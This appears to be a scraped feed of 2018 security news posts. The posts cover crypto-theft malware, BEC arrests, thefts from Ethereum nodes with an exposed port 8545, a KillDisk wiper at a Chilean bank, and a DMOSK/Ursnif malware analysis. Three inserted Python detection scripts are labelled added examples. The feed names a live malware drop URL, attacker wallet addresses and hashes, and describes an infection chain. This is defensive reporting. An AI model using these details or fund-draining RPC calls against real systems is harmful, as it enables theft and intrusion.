In total, the report revealed more than 12,000 such marketplaces containing over 34,000 offerings for would-be crypto-thieves. These products range in value from just over $1 to $1,000, with an average cost of $224. The researchers identified $10 as the “sweet spot” price for the malware samples being sold in these Dark Web forums.

You Get What You Pay For

The authors of the report, titled “Cryptocurrency Gold Rush on the Dark Web,” noted that those prices reflect the purchaser’s level of technical expertise and the degree to which a given sample can evade detection.

“The average listing is likely relatively unsophisticated, and detectable with proper endpoint security,” the report stated. Higher-priced listings, the authors wrote, “enable a more technically proficient user to compile their own malware. While these are still detectable, they are capable of defeating common indicators of compromise (IOCs) and signatures.”

Of the offerings the researchers uncovered, cryptocurrency stealers were the most prevalent at 65 percent of total listings. Cryptojacking malware comprised around 10 percent of offerings on the Dark Web, while mining botnets and mobile malware packages represented just 3.3 percent and 1.6 percent, respectively.

Combating the Cybercrime Economy

The study’s authors advised businesses to protect themselves by deploying an endpoint security solution equipped with prevention and detection capabilities. They also recommended deploying an ad blocker on all endpoints to reduce the risk of attackers hijacking devices to harvest cryptocurrency and restricting access to important financial resources and bank accounts.

Basic security best practices also apply. For example, users should conduct extensive research before participating in a cryptocurrency exchange and create strong, unique passwords across services, the report noted.

The post Thriving Cybercrime Economy Contributes to More Than $1 Billion in Stolen Cryptocurrency appeared first on Security Intelligence.

Protecting consumers from mobile and IoT threats

A new report by Allot Communications revealed a dynamic and automated threat landscape in which consumers lack the security expertise to effectively protect themselves. Mobile and Internet of Things continue to be primary attack vectors, contributing to a spike in cryptojacking, adware, and DDoS attacks. The Telco Security Trends Report is based on anonymous data gathered from four communications service providers (CSPs) across Europe and Israel, who between them, protect seven million customers. It found … More

The post Protecting consumers from mobile and IoT threats appeared first on Help Net Security.

Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.

On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months; 42 suspects have been arrested in the United States, 29 in Nigeria, and the remaining three in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.” 


During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters.

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. In one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by Trend Micro, the damage caused to enterprises by Business Email Compromise (BEC) attacks has grown over the past years, and it is estimated that it could reach $9 billion in 2018. This rising figure takes into account new attack vectors, such as the Dark Caracal campaign attributed to a Lebanese intelligence agency, which delivers malware through Android applications.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing social engineering to lure and deceive employees in a myriad of scams that bypass security measures. By relying on a deep understanding of human psychology, hackers circumvent the defenses; as the report states, “it requires little in the way of special tools or technical knowledge to pull off, instead requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: bogus invoice scheme, CEO fraud, account compromise, attorney impersonation and data theft. The report highlights that these attacks can be classified into two major groups: credential grabbing and email only.

In the analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is the largest category, followed by Confidence Fraud/Romance ($211,382,989) and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”

Pierluigi Paganini

(Security Affairs –BeC, Operation WireWire)

The post Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams appeared first on Security Affairs.

Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545

A cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000, from clients exposing an unsecured JSON-RPC interface on port 8545.

Cybercriminals have raked in over 20 million dollars in the past few months by hijacking poorly configured Ethereum nodes exposed online, and they are continuing their operations.

In March, security experts from Qihoo 360 Netlab reported a hacking campaign aimed at Ethereum nodes exposed online; crooks were scanning for port 8545 to find wallets that exposed their JSON-RPC interface.

According to the researchers, that cybercrime gang stole 3.96234 Ether (between $2,000 and $3,000), but the researchers have now tracked another criminal gang that has already stolen a far larger amount of funds, which are still sitting in the gang’s wallets.

Researchers claim the cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000.

“If you have honeypot running on port 8545, you should be able to see the requests in the payload, which has the wallet addresses,” states Qihoo 360 Netlab team. “And there are quite a few IPs scanning heavily on this port now.”

Geth is a popular client for running an Ethereum node; it allows users to manage the node remotely through the JSON-RPC interface.

Developers can use this programmatic API to build applications that can retrieve private keys, transfer funds, or retrieve personal details of the owner of the wallet.

The hackers moved stolen funds to the Ethereum account having the address 0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464.

The good news is that the JSON-RPC interface comes disabled by default in most apps.

In May 2018, crooks used the Mirai-based Satori botnet to scan the Internet for Ethereum mining software that had accidentally been left exposed online.

Unfortunately, there are several groups actively scanning the Internet for insecure JSON-RPC interfaces in order to steal funds from unsecured cryptocurrency wallets.

Development teams have to secure their applications by only allowing connections to the geth client that originate from the local computer; another option is to implement an authentication mechanism for remote RPC connections.

Experts believe the hackers will increase their scanning for port 8545, also thanks to the availability online of tools that automate the process.
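The honeypot observation quoted above (requests on port 8545 carry the attacker's wallet addresses) can be turned into detection logic. The following script is an added example, not code from the Security Affairs post or from Netlab: it parses JSON-RPC request bodies captured on port 8545, flags the calls that can move funds out of an unlocked account, and extracts the destination addresses as indicators. The captured requests are constructed for the example, with RFC 5737 documentation addresses as source IPs and the destination address quoted in the post.

```python
"""Triage JSON-RPC requests captured on TCP/8545 (added example, constructed data)."""
import json
import re
from collections import Counter

# Methods that use keys or move value. Reachable without authentication,
# these are the calls that let a remote party drain an unlocked account.
SENSITIVE_METHODS = {
    "eth_sendTransaction",
    "personal_sendTransaction",
    "personal_unlockAccount",
    "eth_sign",
}
# Reconnaissance calls: harmless on their own, but they precede a theft attempt.
RECON_METHODS = {"eth_accounts", "personal_listAccounts", "eth_getBalance"}

ADDRESS_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")

# Constructed sample capture: (source_ip, raw HTTP request body) per request.
# 203.0.113.5 behaves like the scanners described in the post; 198.51.100.7 does not.
SAMPLE_CAPTURE = [
    ("203.0.113.5", '{"jsonrpc":"2.0","id":1,"method":"eth_accounts","params":[]}'),
    ("203.0.113.5", '{"jsonrpc":"2.0","id":2,"method":"eth_getBalance",'
                    '"params":["0x1111111111111111111111111111111111111111","latest"]}'),
    ("203.0.113.5", '{"jsonrpc":"2.0","id":3,"method":"eth_sendTransaction",'
                    '"params":[{"from":"0x1111111111111111111111111111111111111111",'
                    '"to":"0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464",'
                    '"value":"0xde0b6b3a7640000"}]}'),
    ("198.51.100.7", '{"jsonrpc":"2.0","id":1,"method":"web3_clientVersion","params":[]}'),
    ("198.51.100.7", "not json at all"),
]


def parse_rpc_calls(body):
    """Return the JSON-RPC call objects in one request body.

    Geth accepts a single object or a batch (JSON array); malformed bodies
    and entries without a string "method" are skipped rather than raising.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return []
    calls = data if isinstance(data, list) else [data]
    return [c for c in calls if isinstance(c, dict) and isinstance(c.get("method"), str)]


def classify(method):
    """Bucket a method name as 'sensitive', 'recon' or 'other'."""
    if method in SENSITIVE_METHODS:
        return "sensitive"
    if method in RECON_METHODS:
        return "recon"
    return "other"


def destination_addresses(call):
    """Extract well-formed 'to' addresses from transaction-style params, lowercased."""
    found = []
    for param in call.get("params", []):
        if isinstance(param, dict):
            to = param.get("to")
            if isinstance(to, str) and ADDRESS_RE.match(to):
                found.append(to.lower())
    return found


def analyze_capture(capture):
    """Aggregate calls per source IP and raise an alert for each source that
    issued a sensitive call; alerts carry the destination addresses seen."""
    per_ip = {}
    for ip, body in capture:
        rec = per_ip.setdefault(
            ip, {"methods": Counter(), "destinations": set(), "recon": 0, "sensitive": 0}
        )
        for call in parse_rpc_calls(body):
            method = call["method"]
            rec["methods"][method] += 1
            kind = classify(method)
            if kind != "other":
                rec[kind] += 1
            if method in ("eth_sendTransaction", "personal_sendTransaction"):
                rec["destinations"].update(destination_addresses(call))
    alerts = [
        {
            "ip": ip,
            "sensitive_calls": rec["sensitive"],
            "recon_calls": rec["recon"],
            "destinations": sorted(rec["destinations"]),
        }
        for ip, rec in per_ip.items()
        if rec["sensitive"]
    ]
    return {"per_ip": per_ip, "alerts": sorted(alerts, key=lambda a: a["ip"])}


if __name__ == "__main__":
    for alert in analyze_capture(SAMPLE_CAPTURE)["alerts"]:
        print(f"{alert['ip']}: {alert['sensitive_calls']} sensitive call(s) after "
              f"{alert['recon_calls']} recon call(s); destinations={alert['destinations']}")
```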

Pierluigi Paganini

(Security Affairs –port 8545, hacking)

The post Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545 appeared first on Security Affairs.

Crooks used a KillDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack

Crooks attempted to hack the SWIFT system at the Banco de Chile and used a disk-wiping malware as a diversion strategy.

The intent of the attackers was to sabotage hundreds of computers at the Banco de Chile while they were attempting to breach the real target, the bank’s SWIFT money transferring system.

By causing a broad outage, the attackers aimed to distract the internal IT staff while carrying out the cyberheist.

The attempted attack took place on May 24; as a result, many systems at several of the bank’s branches were inoperable.

“May 24, 2018, Banco de Chile reports that today it detected the presence of a fault that affected our normal attention in branches, telephone banking and some specific services.” reads the security advisory published by the company,

“This generated the activation of our contingency protocol designed to maintain the continuity of the services, and in no case was the security of the products and transactions of our clients affected.” 

The initial investigation conducted by the bank revealed that its systems were infected by malware.

“After an exhaustive investigation, it was determined that the origin of the detected fault was a virus, presumably from international networks, which directly affected Banco de Chile’s work stations, such as an inn in the offices and terminals of our executives and cashier personnel, among others, causing difficulties in branch service and telephone banking.” reads the announcement published by the bank on May 28.

Analyzing the images posted online by bank employees, it is possible to verify that the infected machines were hit by malware that wiped their hard drives’ Master Boot Records (MBRs).

Bleeping Computer reported a screenshot of private IM conversations posted on a Chilean forum. According to a member of the forum, the wiper destroyed over 9,000 computers and over 500 servers.

According to experts from Arkavia Networks, the malware that infected the systems at the Banco de Chile was a KillDisk sample tracked as KillMBR by Trend Micro.

A couple of days ago, experts at Trend Micro reported the discovery of a new sample of KillDisk in Latin America, the malware infected the systems of a bank.

Trend Micro did not reveal the name of the bank, but likely it was the Chilean bank.

According to the experts, the attackers failed, because their real goal was obtaining access to the SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded KillDisk based on the error message displayed by the affected systems.


The malware discovered by Trend Micro wipes all physical hard disks on the infected system: it retrieves a handle to each hard disk, overwrites the first sector of the disk (512 bytes) with 0x00, and then forces the machine to shut down.
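Because the wipe described above touches only the first 512 bytes, an MBR integrity check is a cheap way to confirm what happened to a host during incident response. The following script is an added example, not code from the Security Affairs post or from Trend Micro's analysis: it inspects the first sector of a disk image, distinguishes a KillMBR-style zeroed sector from a sector whose hash has merely drifted from a known-good baseline, and decodes the partition table. The disk images it runs on are constructed in memory; on a real host the baseline hash must come from a known-good capture of that same disk.

```python
"""Offline first-sector (MBR) integrity check (added example, constructed images)."""
import hashlib
import io
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
PARTITION_ENTRY_SIZE = 16
BOOT_SIG_OFFSET = 510


def read_first_sector(stream):
    """Read exactly one sector from a binary file-like object (disk image or device)."""
    stream.seek(0)
    data = stream.read(SECTOR_SIZE)
    if len(data) != SECTOR_SIZE:
        raise ValueError(f"short read: {len(data)} bytes, expected {SECTOR_SIZE}")
    return data


def partition_entries(sector):
    """Decode the four classic MBR partition entries; empty entries (type 0) are dropped."""
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", sector, off)
        if ptype != 0:
            entries.append({"bootable": status == 0x80, "type": ptype,
                            "lba_start": lba_start, "sectors": sectors})
    return entries


def inspect_mbr(sector, baseline_sha256=None):
    """Classify a first sector as 'zeroed' (KillMBR-style wipe), 'invalid' (no boot
    signature or no partitions), 'modified' (hash differs from baseline) or 'intact'."""
    sha = hashlib.sha256(sector).hexdigest()
    has_sig = sector[BOOT_SIG_OFFSET:BOOT_SIG_OFFSET + 2] == b"\x55\xaa"
    parts = partition_entries(sector) if has_sig else []
    if sector == b"\x00" * SECTOR_SIZE:
        verdict = "zeroed"
    elif not has_sig or not parts:
        verdict = "invalid"
    elif baseline_sha256 is not None and sha != baseline_sha256:
        verdict = "modified"
    else:
        verdict = "intact"
    return {"verdict": verdict, "sha256": sha, "boot_signature": has_sig, "partitions": parts}


def inspect_image(image_bytes, baseline_sha256=None):
    """Convenience wrapper: run inspect_mbr on the first sector of an in-memory image."""
    return inspect_mbr(read_first_sector(io.BytesIO(image_bytes)), baseline_sha256)


def build_sample_mbr():
    """Construct a minimal well-formed MBR with one bootable NTFS partition (sample data)."""
    boot_code = b"\xfa\x33\xc0\x8e\xd0" + b"\x90" * (PARTITION_TABLE_OFFSET - 5)
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xfe\xff\xff", 2048, 204800)
    table = entry + b"\x00" * (PARTITION_ENTRY_SIZE * 3)
    return boot_code + table + b"\x55\xaa"


if __name__ == "__main__":
    good = build_sample_mbr()
    baseline = inspect_mbr(good)["sha256"]
    for label, image in (("known-good", good), ("wiped", b"\x00" * SECTOR_SIZE)):
        print(label, inspect_image(image + b"\x00" * 1024, baseline)["verdict"])
```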

Trend Micro team associated the sample of the KillDisk recently discovered with the operations of a crime gang that a few weeks ago attempted to steal over $110 million from the Mexican bank Bancomext.

Pierluigi Paganini

(Security Affairs –Banco de Chile, wiper)

The post Crooks used a KillDisk wiper in an attack against Banco de Chile as diversion for a SWIFT hack appeared first on Security Affairs.

Security Affairs newsletter Round 166 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Crooks included the code for CVE-2018-8174 IE Zero-Day in the RIG Exploit Kit
Imperva’s research shows 75% of open Redis servers are infected
Microsoft reportedly acquires the GitHub popular code repository hosting service
North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
Thousands of organizations leak sensitive data via misconfigured Google Groups
Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
Zip Slip arbitrary file overwrite vulnerability affects thousands of projects
Iron cybercrime group uses a new backdoor based on HackingTeam’s RCS surveillance software
MyHeritage data breach – 92.3 million user credential exposed
Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
The author of the Sigrun Ransomware decrypts Russian victims’ files for free
Are Wi-Fi hotspots in World Cup Russia host cities secure?
How Threat Hunters Operate in Modern Security Environments
HR Software company PageUp victim of a Data Breach, experts fear a domino effect
It’s not a joke, Owari botnet operators used root as username and password to access a C&C
Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East
Prowli Operation – Crooks already compromised over 40,000 servers and IoT Devices
Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
VPNFilter malware now targets new devices, even behind a firewall
Cisco patches a critical vulnerability in Prime Collaboration Provisioning solution
DMOSK Malware Targeting Italian Companies
Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users
Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
Chinese state-sponsored hackers steal 600GB U.S. Navy data
Cisco removed hardcoded credentials in WAAS software. Undocumented accounts are a frequent issue
Trend Micro spotted a new variant of KillDisk wiper in Latin America


Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 166 – News of the week appeared first on Security Affairs.

#CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online

Summer has officially rolled out its welcome mat. But while most parents might be thinking about slowing down, for most kids, summer is when digital device use goes into overdrive. That’s why June — which also happens to be Internet Safety Month — is a perfect time to strengthen your family’s digital readiness.

Good news: This digital safety skills booster is quick and actionable. And who knows — if a few of these tips boost your family’s safety, you may have just saved summer for everyone!

4 Ways to Boost Family Safety Online 

Practice safe social. Challenge your family to rein in its social footprint by taking these specific actions: 1) Adjust privacy settings on all social networks. 2) Trim friend and follower lists. 3) Delete any personal data on social profiles such as birthdate, address, or school affiliation. 4) Edit and limit app permissions. As we’ve just seen in the headlines, the misuse of personal data is a very big deal. 5) Share with care. Routinely scrolling, liking, and commenting on social sites such as Snapchat and Instagram can give kids a false sense of security (and power). Remind tweens and teens to share responsibly. Oversharing can damage a reputation, and words or images shared callously can damage other people.

Practice safe gaming. Summertime is a gamer’s heaven. Endless battles and showdowns await the dedicated. However, some digital pitfalls can quickly douse the fun. According to the National Cyber Security Alliance’s gaming tip sheet, safe gaming includes: updating gaming software, protecting devices from malware, protecting your child’s personal data, using voice chat safely, and paying close attention to content ratings.

Practice strong security. There are some steps only a parent can take to safeguard the family online. 1) Parental controls. Filtering software blocks inappropriate websites and apps and establishes boundaries for family tech use. 2) Comprehensive security software helps protect your PCs, tablets, and devices from viruses, malware, and identity theft. 3) Keeping your guard up. According to McAfee’s Gary Davis, staying safe online also includes digital habits such as using strong passwords, boosting your network security and firewall, and being aware of the latest scams that target consumers.

Practice wise parenting. 1) Know where kids go. Know which apps your kids love and why, how they interact with others online, and how much time they spend online. 2) Unplug. Establish tech-free family activities this summer. Powering off and plugging into quality time is the most powerful way to keep your family safe online. A strong relationship empowers responsibility. 3) Be confident. As parenting expert Dr. Meg Meeker says, parents should be parenting from a place of confidence, rather than from a place of fear. “The temptation for parents is to think that they have no control over what their child does online. This isn’t true,” says Meeker. “Parents, you are in control of your child’s technology use; it is not in control of you.”


Toni Birdsong is a Family Safety Evangelist at McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post #CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online appeared first on McAfee Blogs.

DMOSK Malware Targeting Italian Companies

The security expert and malware researcher Marco Ramilli published a detailed analysis of a new strain of malware dubbed DMOSK that targets Italian firms.

Today I’d like to share another interesting analysis made by my colleagues and me. It is a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker left the LOG.TXT freely available on the dropping URL, letting us know the IP addresses that clicked on the first analyzed stage (yes, we know the companies that might be infected). Unlike what we did with TaxOlolo, we will not disclose the victims’ IP addresses and so the companies that might be infected. National CERTs have been involved and have been alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick and dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that?!). The email we got had the following body.

Attack Path
A simple link to a drive (drive.carlsongracieanaheim.com) begins the first stage of infection. An email address is given as a parameter to the doc.php script, which records the IP address and the “calling” email address belonging to the victim. The script forces the browser to download a .zip file which, once uncompressed, presents the victim with a JSE file called scan.jse. The file is heavily obfuscated. It was quite difficult to decode the following stage of infection, since the JavaScript was obfuscated through at least 3 different techniques. The following image shows the obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed, once we de-obfuscated it, we figured out that it was dropping and executing another file with the .SCR extension. From this stage it is interesting to observe that only one dropping URL was called. This is strange behaviour; usually attackers use multiple dropping URLs in order to get more chances to infect the victims. The URL found was the following one:
"url": "https://drive.carlsongracieanaheim.com/x/gate.php"

The JSE file dropped the third stage into \User\User\AppData\Local\Temp\38781520.scr, with the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745. At that time it had already been scanned by 68 AV engines, but only 9 of them flagged it as a generic malicious file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

 

Unfortunately, we are still not at the end of the infection chain. The third stage drops and executes another payload. It does not download it from a different dropping website; instead it drops it from a specially crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the fourth-stage payload directly from the victim’s memory.

Fourth Stage: Dropped PE File
Following the analysis, it was possible to figure out that the final payload is something very close to Ursnif, which grabs the victim’s email information and credentials. The following image shows the temporary file built before sending the information out to the command and control servers.

Temporary File Before Sending data to Command and Control

Like any other Ursnif variant, the malware tries to reach a command and control network located both on the clear net and on the TOR network. The IoC section below lists the recorded indicators.
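As an added example (not part of Ramilli's analysis or Yoroi's tooling), the following Python turns the chain just described into two defensive checks: a Windows script host running a .jse that spawns a numeric-named .scr out of the user's Temp folder, and proxy entries for a /wpapi path, the Ursnif-style endpoint in the IoCs. The process events, proxy lines and the host name c2-placeholder.invalid are constructed for the example.

```python
"""Detection logic for the DMOSK infection chain (added example).

Constructed telemetry mirrors the write-up: mail link -> doc.php -> zip ->
scan.jse -> %LOCALAPPDATA%\\Temp\\<digits>.scr -> Ursnif-like payload
beaconing to https://<host>/wpapi.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# script types run by the Windows Script Host; DMOSK used a .jse
SCRIPT_EXT = re.compile(r"\.(?:jse|js|vbs|vbe|wsf)\b", re.I)
# third-stage path from the write-up: \AppData\Local\Temp\38781520.scr
TEMP_SCR = re.compile(r"\\AppData\\Local\\Temp\\\d+\.scr$", re.I)
# Ursnif-style C2 endpoint seen in the IoCs: https://<host>/wpapi
WPAPI = re.compile(r"^https?://([^/\s]+)/wpapi(?:[/?]|$)", re.I)


@dataclass
class ProcEvent:
    """Simplified Sysmon-style process-creation record."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_script_host_run(ev: ProcEvent) -> bool:
    """wscript/cscript launched with a script file on the command line."""
    return basename(ev.image) in SCRIPT_HOSTS and SCRIPT_EXT.search(ev.cmdline) is not None


def is_temp_scr(ev: ProcEvent) -> bool:
    """A digits-only .scr executed from the user's Temp directory."""
    return TEMP_SCR.search(ev.image) is not None


def find_dmosk_chain(events: List[ProcEvent]) -> List[Tuple[ProcEvent, ProcEvent]]:
    """Return (script-host event, .scr event) pairs where the .scr's parent
    is a script host running a .jse/.js/.vbs: the second -> third stage hop."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if not is_temp_scr(ev):
            continue
        parent = by_pid.get(ev.ppid)
        if parent is not None and is_script_host_run(parent):
            hits.append((parent, ev))
    return hits


def wpapi_hosts(proxy_lines: List[str]) -> List[str]:
    """Distinct hosts contacted on a /wpapi path, in order of first sight.
    Constructed line layout: '<timestamp> <client_ip> <url> <status>'."""
    seen: List[str] = []
    for line in proxy_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        m = WPAPI.match(fields[2])
        if m and m.group(1).lower() not in seen:
            seen.append(m.group(1).lower())
    return seen


# Constructed sample telemetry (not real victim data).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\User\Downloads\scan.jse"'),
    ProcEvent(300, 200, r"C:\Users\User\AppData\Local\Temp\38781520.scr",
              r"C:\Users\User\AppData\Local\Temp\38781520.scr"),
    # benign: a logon script that opens a text editor should not match
    ProcEvent(400, 100, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe \\fileserver\netlogon\inventory.vbs"),
    ProcEvent(500, 400, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
SAMPLE_PROXY = [
    "2018-06-07T10:01:02Z 10.0.0.5 https://c2-placeholder.invalid/wpapi 200",
    "2018-06-07T10:01:05Z 10.0.0.5 https://intranet.example/wpapi-docs/index.html 200",
    "2018-06-07T10:02:11Z 10.0.0.9 https://c2-placeholder.invalid/wpapi 200",
]

if __name__ == "__main__":
    for parent, child in find_dmosk_chain(SAMPLE_EVENTS):
        print(f"[DMOSK chain] pid {parent.pid} ({parent.cmdline}) -> {child.image}")
    print("hosts contacted on /wpapi:", wpapi_hosts(SAMPLE_PROXY))
```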

An interesting approach adopted by the attackers is blacklisting. We observed at least 3 blacklists. The first one was based on the victim’s IP. We guess (but we have no evidence of it) that the attacker filters responses by country, in order to make a country-targeted attack possible by blacklisting non-targeted countries. The following image shows the temporary file used to store the victim’s IP. The attacker could use this information to decide whether or not to respond to a specific malware request.

Temporary File Storing the Victim IP Address

A second blacklist that we found was on the dropping URL web site, which was configured not to drop files to specific IP addresses. The main reasons found to deny the dropped payload were three:
  • geo (out of geographical scope). The threat is mainly focused on hitting Italy.
  • asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would make no sense to give the payload to cloud providers.
  • MIT. The attacker does not want the dropped payload to end up with MIT folks; this is quite funny, isn’t it?
A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance of being analyzed; in fact, the blacklisted IPs belong to pretty well-known cybersecurity companies (Yoroi included), which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: this is a reverse targeting attack, where the attacker wants to attack an entire set of victims except some specific ones, so it introduces a technique to block payload delivery. End personal note.
Now we know how the attack works, so let’s try to investigate a little what the attacker messed up. For example, let’s try to analyse the content of the dropping URL. Quite fun to find out that the attacker left his private key freely available! I will not disclose it .... let’s say... out of respect for the attacker (? really ?)

Attacker Private Key !

While the used public certificate is the following one:

Attacker Certificate

By decoding the fake certificate the analyst obtains the following information; of course, none of it is valuable, but it adds a nice touch to the analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16)

Maybe the most “original” string in the entire malware analysis, in the sense of being written by the attacker without thinking too much, is ‘dmosk’ (in the decoded certificate); hence the malware name.
As of today we observed 6617 email addresses that could potentially be compromised, since they clicked on the first stage (evidence on the dropping URL). We have evidence that many organisations have been hit by this malware, which was able to bypass most of the known security protections since it sat behind CloudFlare and had no specific bad reputation. We decided not to disclose the “probably infected” companies. Nationwide CERTs have been alerted (June 7, 2018) and together we will contact the “probably infected” companies to help them mitigate the threat.
Please update your rules, signatures and whatever else you have to block the infection.
PS: the threat is quite a bit bigger than what I described; there are several additional components including an APK (Android malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to favour notification speed over analysis details.
Hope you might find it helpful.

IoC:

  • Dropurl:
    • https://drive[.]carlsongracieanaheim[.]com/doc.php
    • https://drive[.]carlsongracieanaheim[.]com/doc1.php
    • https://drive[.]carlsongracieanaheim[.]com/x/gate.php
    • https://drive[.]carlsongracieanaheim[.]com/1/gate.php
  • Hash:
    • 067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
    • 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
    • 8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
    • 1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
    • afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe

Original analysis available here.

I have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Ministry of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experience by diving into SCADA security issues with some of the biggest industrial conglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(Security Affairs – dmosk, malware)

The post DMOSK Malware Targeting Italian Companies appeared first on Security Affairs.

Cryptomining malware digs into nearly 40% of organizations worldwide

